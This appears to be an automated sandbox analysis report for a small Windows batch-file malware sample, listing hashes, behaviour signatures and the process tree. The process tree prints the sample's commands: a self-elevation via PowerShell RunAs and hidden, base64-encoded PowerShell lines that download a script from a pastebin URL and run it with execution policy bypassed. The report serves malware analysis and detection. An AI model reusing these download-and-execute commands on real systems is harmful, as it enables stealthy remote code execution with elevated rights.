Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08-12-2024 12:53
Static task
static1
Behavioral task
behavioral1
Sample
virus_src.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
virus_src.bat
Resource
win10v2004-20241007-en
General
-
Target
virus_src.bat
-
Size
720B
-
MD5
25cc17794b4a00de0db1dc2f14580af4
-
SHA1
f119d7d9bc38af460a8da42c9dbc09faa77130b1
-
SHA256
847d7d889d1d5dc33f7c24d82dccc71cb9032fd743e8a52364dc5e0a07a03e69
-
SHA512
70b49b9b7f7798f3ae15dfe100bf19eaf734de4c92b18b75295b06e455d64aee16879432ccfb3d95c78cbe301600504cfe485ddde59745dae62d64dd014b83ab
Malware Config
Signatures
-
pid Process 2372 powershell.exe 2920 powershell.exe 2676 powershell.exe 2680 powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2372 powershell.exe 2372 powershell.exe 2372 powershell.exe 2920 powershell.exe 2676 powershell.exe 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2372 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 2676 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3044 wrote to memory of 2372 3044 cmd.exe 31 PID 3044 wrote to memory of 2372 3044 cmd.exe 31 PID 3044 wrote to memory of 2372 3044 cmd.exe 31 PID 2372 wrote to memory of 2392 2372 powershell.exe 32 PID 2372 wrote to memory of 2392 2372 powershell.exe 32 PID 2372 wrote to memory of 2392 2372 powershell.exe 32 PID 2392 wrote to memory of 2920 2392 cmd.exe 34 PID 2392 wrote to memory of 2920 2392 cmd.exe 34 PID 2392 wrote to memory of 2920 2392 cmd.exe 34 PID 2392 wrote to memory of 2676 2392 cmd.exe 35 PID 2392 wrote to memory of 2676 2392 cmd.exe 35 PID 2392 wrote to memory of 2676 2392 cmd.exe 35 PID 2676 wrote to memory of 2680 2676 powershell.exe 36 PID 2676 wrote to memory of 2680 2676 powershell.exe 36 PID 2676 wrote to memory of 2680 2676 powershell.exe 36
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\virus_src.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\virus_src.bat' -ArgumentList "am_admin"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\virus_src.bat" am_admin3⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps15⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e72f7db1dbfcee4edca16898125dc3ad
SHA18438e9889640f0351b5daf37016216b7d094cfad
SHA256018a76bf4a8db2137068bd0e17d441439ff45544c94a509ed7b8b3fbe8071c80
SHA5123003231fb914c27d1b348df192d1511213f4823beaa20304344cc65f98fc9732654ddae408f2db0a1a650190ad75717120abbad1b6abba9ccca67216f830919d